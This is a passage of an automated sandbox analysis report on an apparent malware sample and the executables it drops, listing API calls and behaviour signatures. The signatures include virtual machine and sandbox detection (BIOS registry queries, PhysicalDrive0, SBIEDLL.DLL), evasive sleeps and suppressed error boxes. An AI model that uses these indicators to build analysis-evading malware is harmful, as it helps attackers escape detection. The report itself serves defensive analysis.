Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_1_0040598C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	7_1_0040598C
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 10_2_00405358 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	10_2_00405358
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 10_1_00405358 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	10_1_00405358
Source: C:\Program Files\Internet Explorer\iexplore.exe	Code function: 11_2_00409D7C FindFirstFileA,GetLastError,	11_2_00409D7C
Source: C:\Program Files\Internet Explorer\iexplore.exe	Code function: 11_2_0040672C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	11_2_0040672C
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_2_004087A4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	12_2_004087A4
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_2_0040598C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	12_2_0040598C
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_1_004087A4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	12_1_004087A4
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_1_0040598C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	12_1_0040598C

Contains functionality to query system information

Show sources

Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe

Code function: 2_2_00420328 GetSystemInfo,

2_2_00420328

Contains capabilities to detect virtual machines

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe

Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe

Thread delayed: delay time: -922337203685477

Found dropped PE file which has not been started or loaded

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe

Dropped PE file which has not been started: C:\Users\admin\AppData\Roaming\Default NFolder\Default File.exe

Found large amount of non-executed APIs

Show sources

Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	API coverage: 2.2 %
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	API coverage: 4.8 %
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	API coverage: 4.8 %
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	API coverage: 4.8 %
Source: C:\Program Files\Internet Explorer\iexplore.exe	API coverage: 6.2 %
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	API coverage: 4.0 %

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe TID: 3340	Thread sleep count: 203 > 100
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe TID: 3652	Thread sleep count: 128 > 100
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe TID: 3652	Thread sleep time: -64000ms >= -60000ms
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe TID: 3692	Thread sleep count: 219 > 100
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe TID: 3692	Thread sleep time: -65700ms >= -60000ms
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe TID: 3656	Thread sleep count: 205 > 100
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe TID: 3656	Thread sleep time: -205000ms >= -60000ms
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe TID: 3672	Thread sleep time: -66000ms >= -60000ms
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe TID: 3696	Thread sleep time: -65000ms >= -60000ms
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe TID: 3680	Thread sleep time: -64000ms >= -60000ms
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe TID: 3668	Thread sleep time: -60000ms >= -60000ms
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe TID: 3728	Thread sleep time: -2767011611056431ms >= -60000ms
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe TID: 3728	Thread sleep time: -100000ms >= -60000ms
Source: C:\Users\admin\AppData\Roaming\Java\java.exe TID: 3772	Thread sleep count: 533 > 100

Queries disk information (often used to detect virtual machines)

Show sources

Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe

File opened: PhysicalDrive0

Contains functionality to detect sandboxes (foreground window change detection)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: GetForegroundWindow,Sleep,GetForegroundWindow,OutputDebugStringA,OutputDebugStringA,GetMessageTime,GetWinMetaFileBits,GetLastError,GetTickCount,LoadLibraryA,FindAtomA,FindAtomA,FindAtomA,GetTickCount,GetModuleHandleA,LoadCursorA,GetTickCount,lstrlen,	5_2_0045B93C
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: GetForegroundWindow,Sleep,GetForegroundWindow,OutputDebugStringA,OutputDebugStringA,GetMessageTime,GetWinMetaFileBits,GetLastError,GetTickCount,LoadLibraryA,FindAtomA,FindAtomA,FindAtomA,GetTickCount,GetModuleHandleA,LoadCursorA,GetTickCount,lstrlen,	5_1_0045B93C
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: GetForegroundWindow,Sleep,GetForegroundWindow,OutputDebugStringA,OutputDebugStringA,GetMessageTime,GetWinMetaFileBits,GetLastError,GetTickCount,LoadLibraryA,FindAtomA,FindAtomA,FindAtomA,GetTickCount,GetModuleHandleA,LoadCursorA,GetTickCount,lstrlen,	6_2_0045B93C
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: GetForegroundWindow,Sleep,GetForegroundWindow,OutputDebugStringA,OutputDebugStringA,GetMessageTime,GetWinMetaFileBits,GetLastError,GetTickCount,LoadLibraryA,FindAtomA,FindAtomA,FindAtomA,GetTickCount,GetModuleHandleA,LoadCursorA,GetTickCount,lstrlen,	6_1_0045B93C
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: GetForegroundWindow,Sleep,GetForegroundWindow,OutputDebugStringA,OutputDebugStringA,GetMessageTime,GetWinMetaFileBits,GetLastError,GetTickCount,LoadLibraryA,FindAtomA,FindAtomA,FindAtomA,GetTickCount,GetModuleHandleA,LoadCursorA,GetTickCount,lstrlen,	7_2_0045B93C
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: GetForegroundWindow,Sleep,GetForegroundWindow,OutputDebugStringA,OutputDebugStringA,GetMessageTime,GetWinMetaFileBits,GetLastError,GetTickCount,LoadLibraryA,FindAtomA,FindAtomA,FindAtomA,GetTickCount,GetModuleHandleA,LoadCursorA,GetTickCount,lstrlen,	7_1_0045B93C
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: GetForegroundWindow,Sleep,GetForegroundWindow,OutputDebugStringA,OutputDebugStringA,GetMessageTime,GetWinMetaFileBits,GetLastError,GetTickCount,LoadLibraryA,FindAtomA,FindAtomA,FindAtomA,GetTickCount,GetModuleHandleA,LoadCursorA,GetTickCount,lstrlen,	12_2_0045B93C
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: GetForegroundWindow,Sleep,GetForegroundWindow,OutputDebugStringA,OutputDebugStringA,GetMessageTime,GetWinMetaFileBits,GetLastError,GetTickCount,LoadLibraryA,FindAtomA,FindAtomA,FindAtomA,GetTickCount,GetModuleHandleA,LoadCursorA,GetTickCount,lstrlen,	12_1_0045B93C

Tries to detect sandboxes and other dynamic analysis tools (process name)

Show sources

Source: 40D19FBA73C6B011814E2C6920E8792F.exe, FB_3449.tmp.exe, FB_3804.tmp.exe, FB_390E.tmp.exe

Binary or memory string: SBIEDLL.DLL

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Show sources

Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Code function: 2_2_00456690 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,	2_2_00456690
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Code function: 2_1_00456690 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,	2_1_00456690
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_2_00455F9C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	5_2_00455F9C
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_2_0043D0B8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	5_2_0043D0B8
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_2_00453090 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	5_2_00453090
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_2_0042658C IsIconic,GetWindowPlacement,GetWindowRect,	5_2_0042658C
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_2_0043C810 IsIconic,GetCapture,	5_2_0043C810
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_2_00456690 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,	5_2_00456690
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_2_00456740 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,	5_2_00456740
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_2_0043D99C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	5_2_0043D99C
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_1_00455F9C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	5_1_00455F9C
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_1_0043D0B8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	5_1_0043D0B8
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_1_00453090 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	5_1_00453090
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_1_0042658C IsIconic,GetWindowPlacement,GetWindowRect,	5_1_0042658C
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_1_0043C810 IsIconic,GetCapture,	5_1_0043C810
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_1_00456690 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,	5_1_00456690
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_1_00456740 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,	5_1_00456740
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_1_0043D99C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	5_1_0043D99C
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_2_00455F9C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	6_2_00455F9C
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_2_0043D0B8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	6_2_0043D0B8
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_2_00453090 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	6_2_00453090
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_2_0042658C IsIconic,GetWindowPlacement,GetWindowRect,	6_2_0042658C
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_2_0043C810 IsIconic,GetCapture,	6_2_0043C810
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_2_00456690 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,	6_2_00456690
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_2_00456740 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,	6_2_00456740
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_2_0043D99C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	6_2_0043D99C
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_1_00455F9C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	6_1_00455F9C
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_1_0043D0B8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	6_1_0043D0B8
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_1_00453090 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	6_1_00453090
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_1_0042658C IsIconic,GetWindowPlacement,GetWindowRect,	6_1_0042658C
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_1_0043C810 IsIconic,GetCapture,	6_1_0043C810
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_1_00456690 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,	6_1_00456690
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_1_00456740 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,	6_1_00456740
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_1_0043D99C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	6_1_0043D99C
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_2_00455F9C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	7_2_00455F9C
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_2_0043D0B8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	7_2_0043D0B8
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_2_00453090 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	7_2_00453090
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_2_0042658C IsIconic,GetWindowPlacement,GetWindowRect,	7_2_0042658C
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_2_0043C810 IsIconic,GetCapture,	7_2_0043C810
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_2_00456690 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,	7_2_00456690
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_2_00456740 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,	7_2_00456740
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_2_0043D99C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	7_2_0043D99C
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_1_00455F9C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	7_1_00455F9C
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_1_0043D0B8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	7_1_0043D0B8
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_1_00453090 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	7_1_00453090
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_1_0042658C IsIconic,GetWindowPlacement,GetWindowRect,	7_1_0042658C
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_1_0043C810 IsIconic,GetCapture,	7_1_0043C810
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_1_00456690 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,	7_1_00456690
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_1_00456740 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,	7_1_00456740
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_1_0043D99C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	7_1_0043D99C
Source: C:\Program Files\Internet Explorer\iexplore.exe	Code function: 11_2_00451994 IsIconic,GetCapture,	11_2_00451994
Source: C:\Program Files\Internet Explorer\iexplore.exe	Code function: 11_2_00452BC8 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	11_2_00452BC8
Source: C:\Program Files\Internet Explorer\iexplore.exe	Code function: 11_2_0042C594 IsIconic,GetWindowPlacement,GetWindowRect,	11_2_0042C594
Source: C:\Program Files\Internet Explorer\iexplore.exe	Code function: 11_2_00431730 GetWindowLongA,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongA,SetWindowLongA,ShowWindow,ShowWindow,	11_2_00431730
Source: C:\Program Files\Internet Explorer\iexplore.exe	Code function: 11_2_0045229C IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	11_2_0045229C
Source: C:\Program Files\Internet Explorer\iexplore.exe	Code function: 11_2_004316B4 IsIconic,	11_2_004316B4
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_2_00455F9C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	12_2_00455F9C
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_2_0043D0B8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	12_2_0043D0B8
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_2_00453090 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	12_2_00453090
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_2_0042658C IsIconic,GetWindowPlacement,GetWindowRect,	12_2_0042658C
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_2_0043C810 IsIconic,GetCapture,	12_2_0043C810
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_2_00456690 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,	12_2_00456690
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_2_00456740 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,	12_2_00456740
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_2_0043D99C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	12_2_0043D99C
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_1_00455F9C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	12_1_00455F9C
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_1_0043D0B8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	12_1_0043D0B8
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_1_00453090 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	12_1_00453090
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_1_0042658C IsIconic,GetWindowPlacement,GetWindowRect,	12_1_0042658C
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_1_0043C810 IsIconic,GetCapture,	12_1_0043C810
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_1_00456690 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,	12_1_00456690
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_1_00456740 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,	12_1_00456740
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_1_0043D99C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	12_1_0043D99C

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process information set: NOOPENFILEERRORBOX
